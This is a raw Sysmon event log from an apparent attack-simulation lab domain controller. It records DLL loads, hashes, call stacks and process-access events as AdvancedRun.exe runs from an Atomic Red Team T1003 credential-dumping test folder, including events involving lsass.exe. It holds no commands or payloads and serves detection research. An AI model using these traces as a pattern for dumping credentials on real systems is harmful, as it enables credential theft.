C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955095Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.065{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955094Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.065{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003955093Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.050{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT 
AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003955092Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.050{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003955091Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.050{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003955090Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:31:18.050{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003955089Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.050{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955088Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.050{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955087Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.050{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955086Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.050{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955085Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.050{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003955084Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.050{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955083Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.050{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955082Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955081Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955080Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955079Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955078Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft 
CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955077Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955076Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955075Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003955074Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955073Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955072Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955071Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955070Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955069Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955068Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls 
LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955067Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955066Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955065Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003955064Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955063Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955062Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.034{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955061Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.559{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953215Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.559{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953214Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.559{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953213Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
